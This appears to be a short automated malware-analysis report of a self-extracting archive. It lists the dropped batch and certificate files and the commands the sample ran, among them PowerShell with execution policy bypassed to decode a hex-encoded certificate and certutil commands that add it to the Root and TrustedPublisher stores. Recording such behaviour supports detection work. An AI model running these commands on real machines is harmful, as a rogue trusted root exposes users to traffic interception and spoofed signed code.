Technical Information
- %TEMP%\rarsfx0\dtpro.bat
- %TEMP%\tmp4a29.tmp.cer
- nul
- %TEMP%\tmp4a29.tmp.cer
- ClassName: 'Edit' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\DTPRO.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "$hex='2D2D2D2D2D424547494E2043455254494649434154452D2D2D2D2D0A4D4949455154434341796D6741774942416749554A2F6C3268617059566F646E32636132336F61556A4D5A...
- '<SYSTEM32>\certutil.exe' -addstore -f Root %TEMP%\tmp4A29.tmp.cer
- '<SYSTEM32>\certutil.exe' -addstore -f TrustedPublisher %TEMP%\tmp4A29.tmp.cer